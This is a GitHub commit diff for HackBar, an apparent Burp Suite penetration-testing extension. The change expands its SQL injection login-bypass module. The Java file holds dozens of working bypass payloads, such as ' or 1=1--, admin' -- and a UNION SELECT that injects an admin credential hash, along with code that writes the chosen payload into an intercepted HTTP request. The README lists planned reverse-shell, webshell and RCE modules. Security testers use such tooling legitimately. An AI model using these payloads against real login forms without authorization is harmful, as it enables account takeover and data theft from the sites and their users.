Updated SQLi Login bypass

d3vilbug · Sep 7, 2018 · a4bb3d6 · a4bb3d6
1 parent 6a2a55a
commit a4bb3d6
Show file tree

Hide file tree

Showing 5 changed files with 155 additions and 10 deletions.
diff --git a/README.md b/README.md
@@ -19,12 +19,12 @@
 
 ### Download
 
-	Download Jar /~https://github.com/d3vilbug/HackBar/releases and add in burpsuite
+	Download Jar '/~https://github.com/d3vilbug/HackBar/releases' and add in burpsuite
 
 ### Tested on
 - Burpsuite 1.7.36
 - Windows 7/8.1/10
-- Kali linux (2013.3)
+- Kali linux (2018.3)
 
 ### Upcoming Features/Modules
 - XSS payload
@@ -34,9 +34,10 @@
 - Reverse Shell Code snippets
 - Decoder/Encoder
 - LFI payloads
-- XXE
+- XXE 
 - RCE
 - Mini Webshells
+- Simulate Attack (Automatically test complete cheat sheet with one click)
 
 ### Greet
 - An0n 3xPloiTeR /~https://github.com/Anon-Exploiter/ for SQLi && XSS payloads 
diff --git a/build/built-jar.properties b/build/built-jar.properties
@@ -1,4 +1,4 @@
-#Fri, 07 Sep 2018 00:39:59 +0500
+#Sat, 08 Sep 2018 01:56:29 +0500
 
 
 C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar=
diff --git a/build/classes/burp/SQL_Menu.class b/build/classes/burp/SQL_Menu.class
diff --git a/nbproject/private/private.xml b/nbproject/private/private.xml
@@ -3,7 +3,10 @@
     <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
     <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
         <group>
+            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/Methods.java</file>
+            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQli_LoginBypass.java</file>
             <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java</file>
+            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/BurpExtender.java</file>
         </group>
     </open-files>
 </project-private>
diff --git a/src/burp/SQli_LoginBypass.java b/src/burp/SQli_LoginBypass.java
@@ -21,7 +21,7 @@ public class SQli_LoginBypass extends JMenu {
     public String[] Login_Menu = {"Set 1","Set 2","Set 3","Set 4","Set 5"};
     public String LoginMenuItems[][] = {
         {"' or ''='", "' or 1='1", "' or '1'='1", "' or ' 1=1", "' or 1=1--", "' or 1=1#", "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--", "' or 1=1)#"},
-        {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "' or 'x'='x", "') or ('x'='x", "' or 1=1–", "' or a=a–"},
+        {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "') or ('x'='x", "' or 1=1–", "' or a=a–"},
         {"') or ('a'='a", "hi' or 1=1 –", "'or'1=1?", "'-'", "' '", "'&'", "'^'", "'*'", "' or ''-'", "' or '' '"},
         {"' or ''&'", "' or ''^'", "' or ''*'", "or true--", "' or true--", "') or ('x')=('x", "')) or (('x'))=(('x", "admin' --", "admin' #", "admin'/*"},
         {"admin' or '1'='1", "admin' or '1'='1'--", "admin' or '1'='1'#", "admin' or '1'='1'/*", "admin'or 1=1 or ''='", "admin') or ('1'='1", "admin') or ('1'='1'/*", "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"},
@@ -57,14 +57,155 @@ public void actionPerformed(ActionEvent e) {
         String action = e.getActionCommand();
         byte[] newRequest = do_loginBypass(request, selectString, action, selectedIndex);
         req.setRequest(newRequest);
-        JOptionPane.showMessageDialog(null, action);
     }
 
     public byte[] do_loginBypass(byte[] request, String selectedString, String action, int[] selectedIndex){
-//        swtich(action){
-//            case " a":
-//            break;
-//        }
+        switch(action){
+            case "' or ''='": 
+		selectedString = "' or ''='";
+		break;
+            case "' or 1='1": 
+		selectedString = "' or 1='1";
+		break;
+            case "' or '1'='1": 
+		selectedString = "' or '1'='1";
+		break;
+            case "' or ' 1=1": 
+		selectedString = "' or ' 1=1";
+		break;
+            case "' or 1=1--": 
+		selectedString = "' or 1=1--";
+		break;
+            case "' or 1=1#": 
+		selectedString = "' or 1=1#";
+		break;
+            case "' or 1=1/*": 
+		selectedString = "' or 1=1/*";
+		break;
+            case "') or '1'='1--": 
+		selectedString = "') or '1'='1--";
+		break;
+            case "') or ('1'='1--": 
+		selectedString = "') or ('1'='1--";
+		break;
+            case "' or 1=1)#": 
+		selectedString = "' or 1=1)#";
+		break;
+            case "' or '1?='1": 
+		selectedString = "' or '1?='1";
+		break;
+            case "' or 'x'='x": 
+		selectedString = "' or 'x'='x";
+		break;
+            case "' or 0=0 –": 
+		selectedString = "' or 0=0 –";
+		break;
+            case "or 0=0 –": 
+		selectedString = "or 0=0 –";
+		break;
+            case "' or 0=0 #": 
+		selectedString = "' or 0=0 #";
+		break;
+            case "or 0=0 #": 
+		selectedString = "or 0=0 #";
+		break;
+            case "') or ('x'='x": 
+		selectedString = "') or ('x'='x";
+		break;
+            case "' or 1=1–": 
+		selectedString = "' or 1=1–";
+		break;
+            case "' or a=a–": 
+		selectedString = "' or a=a–";
+		break;
+            case "') or ('a'='a": 
+		selectedString = "') or ('a'='a";
+		break;
+            case "hi' or 1=1 –": 
+		selectedString = "hi' or 1=1 –";
+		break;
+            case "'or'1=1?": 
+		selectedString = "'or'1=1?";
+		break;
+            case "'-'": 
+		selectedString = "'-'";
+		break;
+            case "' '": 
+		selectedString = "' '";
+		break;
+            case "'&'": 
+		selectedString = "'&'";
+		break;
+            case "'^'": 
+		selectedString = "'^'";
+		break;
+            case "'*'": 
+		selectedString = "'*'";
+		break;
+            case "' or ''-'": 
+		selectedString = "' or ''-'";
+		break;
+            case "' or '' '": 
+		selectedString = "' or '' '";
+		break;
+            case "' or ''&'": 
+		selectedString = "' or ''&'";
+		break;
+            case "' or ''^'": 
+		selectedString = "' or ''^'";
+		break;
+            case "' or ''*'": 
+		selectedString = "' or ''*'";
+		break;
+            case "or true--": 
+		selectedString = "or true--";
+		break;
+            case "' or true--": 
+		selectedString = "' or true--";
+		break;
+            case "') or ('x')=('x": 
+		selectedString = "') or ('x')=('x";
+		break;
+            case "')) or (('x'))=(('x": 
+		selectedString = "')) or (('x'))=(('x";
+		break;
+            case "admin' --": 
+		selectedString = "admin' --";
+		break;
+            case "admin' #": 
+		selectedString = "admin' #";
+		break;
+            case "admin'/*": 
+		selectedString = "admin'/*";
+		break;
+            case "admin' or '1'='1": 
+		selectedString = "admin' or '1'='1";
+		break;
+            case "admin' or '1'='1'--": 
+		selectedString = "admin' or '1'='1'--";
+		break;
+            case "admin' or '1'='1'#": 
+		selectedString = "admin' or '1'='1'#";
+		break;
+            case "admin' or '1'='1'/*": 
+		selectedString = "admin' or '1'='1'/*";
+		break;
+            case "admin'or 1=1 or ''='": 
+		selectedString = "admin'or 1=1 or ''='";
+		break;
+            case "admin') or ('1'='1": 
+		selectedString = "admin') or ('1'='1";
+		break;
+            case "admin') or ('1'='1'/*": 
+		selectedString = "admin') or ('1'='1'/*";
+		break;
+            case "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055": 
+		selectedString = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055";
+		break;
+            default:
+                selectedString = selectedString;
+        }
+        selectedString = selectedString.replace(" ", "+");
         return Methods.do_modify_request(request, selectedIndex, selectedString);
     }